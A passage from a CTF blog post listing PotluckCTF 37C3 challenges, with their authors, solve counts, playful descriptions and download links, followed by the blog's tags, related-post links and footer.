  <summary>bear-err - 2 solves</summary>

  <p>Created by: <code class="language-plaintext highlighter-rouge">Firzen</code></p>

  <blockquote>
    <p>People always say crypto is so hard, but I’m sure I didn’t fuck up there. Parsing JSON is super easy too, just use strtok.</p>
  </blockquote>

  <p><strong>Files:</strong> <a href="https://web.archive.org/web/20231230022558/https://storage.googleapis.com/potluckctf/challenge07-dist.tgz">challenge07-dist.tgz</a></p>
</details>

<details>
  <summary>Pot of Gold - 2 solves</summary>

  <p>Created by: <code class="language-plaintext highlighter-rouge">blasty</code></p>

  <blockquote>
    <p>You are tasked to help out in the kitchen of the elusive g0rd0n r4ms4y. This rude chef needs to be put in his place real bad! Show us you’re an elite chef and attempt a coup of his little kitchen.</p>
  </blockquote>

  <p><strong>Files:</strong> <a href="https://web.archive.org/web/20231230022015/https://storage.googleapis.com/potluckctf/challenge27-dist.tgz">challenge27-dist.tgz</a></p>
</details>

<details>
  <summary>sandboxes - 2 solves</summary>

  <p>Created by: <code class="language-plaintext highlighter-rouge">borysp, valis</code></p>

  <blockquote>
    <p>With our state-of-the-art sandbox, you can nuke anything without any worries. Can you get the flag though?</p>
  </blockquote>

  <p><strong>Files:</strong> <a href="https://web.archive.org/web/20231230021431/https://storage.googleapis.com/potluckctf/challenge25-dist.tgz">challenge25-dist.tgz</a></p>
</details>

<details>
  <summary>Tamagoyaki - 1 solve</summary>

  <p>Created by: <code class="language-plaintext highlighter-rouge">UDP - Blue Water</code></p>

  <blockquote>
    <p>Tamagoyaki (literally ‘grilled egg’) is a Japanese omelette crafted by rolling layers of fried, beaten eggs.<br>Tamagoyaki shares similarities with glibc’s malloc, as it also contains several layers of fried and beaten code.<br>Note: Expect 4 bits of bruteforce; Anything above that is probably a bad idea</p>
  </blockquote>

  <p><strong>Files:</strong> <a href="https://web.archive.org/web/20231230022310/https://storage.googleapis.com/potluckctf/challenge26-dist.tgz">challenge26-dist.tgz</a></p>
</details>

<details>
  <summary>Cookmaster 2 - 0 solves</summary>

  <p>Created by: <code class="language-plaintext highlighter-rouge">gmerz &amp; cluosh from We_0wn_Y0u</code></p>

  <blockquote>
    <p>It’s the potluck season again! But as every year, that damn dude Jerry brought his special Cookmaster and is stealing the show with his secret sauce! But not this year. It’s time to teach him a lesson! Can you steal the recipe for his secret sauce and corrupt his Cookmaster to put a bad taste to his food?<br>You even bought your own Cookmaster to try everything before you can pull of your heist during the potluck!<br>Flag 1: Can you access the system and extract the secret sauce? Flag 2: Great, you got system access! Now all that’s left to do, hack the system and corrupt the heater to grill his sauce!</p>
  </blockquote>

  <p><strong>Files:</strong> <a href="https://web.archive.org/web/20231230022938/https://storage.googleapis.com/potluckctf/challenge17-dist.tgz">challenge17-dist.tgz</a></p>
</details>

<h3 id="reversing---05-solved">
<span class="me-2">reversing - 0/5 solved</span><a href="#reversing---05-solved" class="anchor text-muted"><i class="fas fa-hashtag"></i></a>
</h3>

<details>
  <summary>GACHAAAAAtkr - 7 solves</summary>

  <p>Created by: <code class="language-plaintext highlighter-rouge">Project Sekai!</code></p>

  <blockquote>
    <p>Wow it’s another gacha game… but everything is so expensive! Everyone’s showing off their characters, but I don’t have any. Would be a shame if there was a cheat code that could give me some!<br>Note: The challenge was created with Python version 3.12.0a7.<br>Thanks to enscribe (https://enscribe.dev) for the assets used in the game!</p>
  </blockquote>

  <p><strong>Files:</strong> <a href="https://web.archive.org/web/20231230020214/https://storage.googleapis.com/potluckctf/challenge14-dist.tgz">challenge14-dist.tgz</a></p>
</details>

<details>
  <summary>Hypertext O's - 3 solves</summary>

  <p>Created by: <code class="language-plaintext highlighter-rouge">Leeky</code></p>

  <blockquote>
    <p>Who needs a local file system anyways.</p>
  </blockquote>

  <p><strong>Files:</strong> None provided :(</p>
</details>

<details>
  <summary>Charming Circuit Challenge - 1 solve</summary>

  <p>Created by: <code class="language-plaintext highlighter-rouge">Tethys &amp; kriztw</code></p>

  <blockquote>
    <p>Last week I had a fever dream about Brian Silverman’s excessive love of Christmas lights. When I came to my senses this program was on my computer. I don’t know what it does. Can you help me?</p>
  </blockquote>

  <p><strong>Files:</strong> <a href="https://web.archive.org/web/20231230015717/https://storage.googleapis.com/potluckctf/challenge04-windows-dist.tgz">challenge04-windows-dist.tgz</a> <a href="https://web.archive.org/web/20231230015930/https://storage.googleapis.com/potluckctf/challenge04-mac-dist.tgz">challenge04-mac-dist.tgz</a> <a href="https://web.archive.org/web/20231230020020/https://storage.googleapis.com/potluckctf/challenge04-linux-dist.tgz">challenge04-linux-dist.tgz</a></p>
</details>

<details>
  <summary>REhoST - 1 solve</summary>

  <p>Created by: <code class="language-plaintext highlighter-rouge">Liikt</code></p>

  <blockquote>
    <p>Our development team created a secure way of booting firmware by authenticating against a different chip. We have the firmware, however we don’t have the secure chip at hand :c Can you help us by emulating the secure processor so that we can boot our firmware?</p>
  </blockquote>

  <p><strong>Files:</strong> <a href="https://web.archive.org/web/20231230015612/https://storage.googleapis.com/potluckctf/challenge29-dist.tgz">challenge29-dist.tgz</a></p>
</details>

<details>
  <summary>Enchiladas - 0 solves</summary>

  <p>Created by: <code class="language-plaintext highlighter-rouge">noobtracker, hanemile, maride</code></p>

  <blockquote>
    <p>Ever been to Mexico? Here is your ticket: https://github.com/maride/mexico</p>
  </blockquote>

  <p><strong>Files:</strong> <a href="https://web.archive.org/web/20231230020346/https://storage.googleapis.com/potluckctf/challenge08-dist.tgz">challenge08-dist.tgz</a></p>
</details>

<h3 id="sandbox---01-solved">
<span class="me-2">sandbox - 0/1 solved</span><a href="#sandbox---01-solved" class="anchor text-muted"><i class="fas fa-hashtag"></i></a>
</h3>

<details>
  <summary>Cake of Paranoia - 3 solves</summary>

  <p>Created by: <code class="language-plaintext highlighter-rouge">Addison Crump</code></p>

  <blockquote>
    <p>A layer cake of paranoia. Please enjoy, and don’t be afraid to take seconds.<br>Top tip: Due to restrictions caused by virtualisation, you may need to limit your transfer rate when submitting large payloads to the server. Consider compression!</p>
  </blockquote>

  <p><strong>Files:</strong> <a href="https://archive.org/download/challenge01-dist-37C3-PotluckCTF/challenge01-dist.tgz">challenge01-dist.tgz</a></p>
</details>

<h3 id="web---14-solved">
<span class="me-2">web - 1/4 solved</span><a href="#web---14-solved" class="anchor text-muted"><i class="fas fa-hashtag"></i></a>
</h3>

<details>
  <summary>✅ Encoderchef - 161 solves</summary>

  <p>Created by: <code class="language-plaintext highlighter-rouge">ntomsic</code></p>

  <blockquote>
    <p>I heard Cyberchef is monitored by GCHQ so I am trying to build my own version. It is still under construction so if you see any problems with the site just send a link to the admin and they will have a look :) // (Flag is in admin cookie)</p>
  </blockquote>

  <p><strong>Files:</strong> None provided :(</p>
</details>

<details>
  <summary>Santify - 58 solves</summary>

  <p>Created by: <code class="language-plaintext highlighter-rouge">13x1</code></p>

  <blockquote>
    <p>I found this shop that claims to provide ““delivery via reindeer sleigh””. I ordered a few things, but the cards did not arrive on time! Please find out what went wrong.<br>Anyway, check out their web page<br>Note: Any accounts named ADMIN, BOT or similar are regular users and not part of the challenge, please ignore them</p>
  </blockquote>

  <p><strong>Files:</strong> None provided :(</p>
</details>

<details>
  <summary>savaoury - 3 solves</summary>

  <p>Created by: <code class="language-plaintext highlighter-rouge">thegrandpew - Blue Water</code></p>

  <blockquote>
    <p>The author did not provide a description. Good luck!</p>
  </blockquote>

  <p><strong>Files:</strong> <a href="https://web.archive.org/web/20231230021343/https://storage.googleapis.com/potluckctf/challenge05-dist.tgz">challenge05-dist.tgz</a></p>
</details>

<details>
  <summary>Traditional Feast: Nginx Spagetthi - 3 solves</summary>

  <p>Created by: <code class="language-plaintext highlighter-rouge">BitK, XeR</code></p>

  <blockquote>
    <p>Imagine a world where your code soars on the performance of nginx, dancing gracefully with modern scripting and transformation powers. While PHP aficionados are still trying to figure out their 500 internal errors and CGI fans are busy scripting their way to the last century, you’ll be light-years ahead, sipping espresso and deploying functionalities like it’s nobody’s business.</p>
  </blockquote>

  <p><strong>Files:</strong> <a href="">challenge24-dist.tgz</a></p>
</details>


  </div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    
      <div class="post-meta mb-3">
        <i class="far fa-folder-open fa-fw me-1"></i>
        
          <a href="/categories/ctf-jeopardy/">CTF Jeopardy</a>
      </div>
    

    <!-- tags -->
    
      <div class="post-tags">
        <i class="fa fa-tags fa-fw me-1"></i>
        
          <a href="/tags/ctf-jeopardy/" class="post-tag no-text-decoration">ctf jeopardy</a>
        
          <a href="/tags/web/" class="post-tag no-text-decoration">web</a>
        
          <a href="/tags/cookies/" class="post-tag no-text-decoration">cookies</a>
        
          <a href="/tags/xss/" class="post-tag no-text-decoration">xss</a>
        
          <a href="/tags/latex/" class="post-tag no-text-decoration">latex</a>
        
          <a href="/tags/rce/" class="post-tag no-text-decoration">rce</a>
        
      </div>
    

    <div class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      ">
      <div class="license-wrapper">
        
          

          This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.
        
      </div>

      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">Share</span>
  <span class="share-icons">
    
    
    

    

      

      <a href="https://twitter.com/intent/tweet?text=PotluckCTF%2037C3%20-%20Challenges/Writeups%20-%20sealldev&amp;url=https%3A%2F%2Fseall.dev%2Fposts%2F37c3potluckctf" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter">
        <i class="fa-fw fab fa-twitter"></i>
      </a>
    

      

      <a href="https://www.facebook.com/sharer/sharer.php?title=PotluckCTF%2037C3%20-%20Challenges/Writeups%20-%20sealldev&amp;u=https%3A%2F%2Fseall.dev%2Fposts%2F37c3potluckctf" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook">
        <i class="fa-fw fab fa-facebook-square"></i>
      </a>
    

      

      <a href="https://t.me/share/url?url=https%3A%2F%2Fseall.dev%2Fposts%2F37c3potluckctf&text=PotluckCTF%2037C3%20-%20Challenges/Writeups%20-%20sealldev" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram">
        <i class="fa-fw fab fa-telegram"></i>
      </a>
    

      

      <a href="https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Fseall.dev%2Fposts%2F37c3potluckctf" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Linkedin" aria-label="Linkedin">
        <i class="fa-fw fab fa-linkedin"></i>
      </a>
    

    <button id="copy-link" aria-label="Copy link" class="btn small" data-bs-toggle="tooltip" data-bs-placement="top" title="Copy link" data-title-succeed="Link copied successfully!">
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>


            
          </main>

          <!-- panel -->
          <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 mb-5 text-muted">
            <div class="access">
              <!-- Get 5 last posted/updated posts -->














  <section id="access-lastmod">
    <h2 class="panel-heading">Recently Updated</h2>
    <ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2">
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/seceduweek22024">SECedu Week 2 2024 - Challenge Writeups</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/seceduweek12024">SECedu Week 1 2024 - Challenge Writeups</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/downunderctf2024">DownUnderCTF 2024 - Challenge Writeups</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/utstechfest2024">UTS TechFest 2024 CTF - Challenge Writeups</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/scones2024">SCONES 2024 Onsite &amp; Online CTF - Challenge Writeups</a>
        </li>
      
    </ul>
  </section>
  <!-- #access-lastmod -->


              <!-- The trending tags list -->















  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/web/">web</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/ctf-jeopardy/">ctf jeopardy</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/hackthebox/">hackthebox</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/forens/">forens</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/hackthebox-easy/">hackthebox easy</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/linux/">linux</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/misc/">misc</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/osint/">osint</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/rce/">rce</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/crypto/">crypto</a>
      
    </div>
  </section>


            </div>

            
              
              



  <section id="toc-wrapper" class="ps-0 pe-4">
    <h2 class="panel-heading ps-3 pt-2 mb-2">Contents</h2>
    <nav id="toc"></nav>
  </section>


            
          </aside>
        </div>

        <div class="row">
          <!-- tail -->
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->


<!-- An random integer that bigger than 0 -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->














  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
    
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  











  <aside id="related-posts" aria-labelledby="related-label">
    <h3 class="mb-4" id="related-label">Further Reading</h3>
    <nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4">
      
        <article class="col">
          <a href="/posts/backdoorctf2023" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time data-ts="1702818000" data-df="ll">
  Dec 18, 2023
</time>

              <h4 class="pt-0 my-2">Backdoor CTF 2023 - Challenges/Writeups</h4>
              <div class="text-muted">
                <p>
                  





                  I participated in the BackdoorCTF 2023, which was my first CTF in a year. For a first time back, me and my teammate got 7 flags. The following is a writeup/walkthrough of how each flag was grabbed ...
                </p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/codify-htb/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time data-ts="1704027600" data-df="ll">
  Jan  1, 2024
</time>

              <h4 class="pt-0 my-2">Codify HackTheBox Machine - Writeup</h4>
              <div class="text-muted">
                <p>
                  





                  An easy linux box to start off the year!

Machine created by: kavigihan

Recon
I start off my recon by doing a portscan of the IP.

1
2
3
4
5
6
7
8
9
10
11
$ sudo nmap 10.10.11.239 --top-ports 1000...
                </p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/cozyhosting-htb/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time data-ts="1704114000" data-df="ll">
  Jan  2, 2024
</time>

              <h4 class="pt-0 my-2">CozyHosting HackTheBox Machine - Writeup</h4>
              <div class="text-muted">
                <p>
                  





                  Another machine today! This one had me quite stumped on the user flag…

Machine created by: commandercool

Recon

Starting with a nmap scan of the IP, we see 3 open ports.

1
2
3
4
5
6
7
8
9
$ sudo...
                </p>
              </div>
            </div>
          </a>
        </article>
      
    </nav>
  </aside>
  <!-- #related-posts -->


            
              
              <!-- Navigation buttons at the bottom of the post. -->

<nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation">
  
  

  
    <a href="/posts/backdoorctf2023" class="btn btn-outline-primary" aria-label="Older">
      <p>Backdoor CTF 2023 - Challenges/Writeups</p>
    </a>
  

  
    <a href="/posts/codify-htb/" class="btn btn-outline-primary" aria-label="Newer">
      <p>Codify HackTheBox Machine - Writeup</p>
    </a>
  
</nav>

            
              
              <!--  The comments switcher -->


            

            <!-- The Footer -->

<footer aria-label="Site Info" class="
    d-flex flex-column justify-content-center text-muted
    flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3
  ">
  <p>©
    <time>2024</time>

    
      <a href="https://github.com/sealldeveloper">sealldev</a>.
    

    
      <span data-bs-toggle="tooltip" data-bs-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span>
    
  </p>

  <p>Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.
  </p>
</footer>

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center unloaded">
  <div class="col-11 content">
    <div id="search-hints">
      <!-- The trending tags list -->















  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
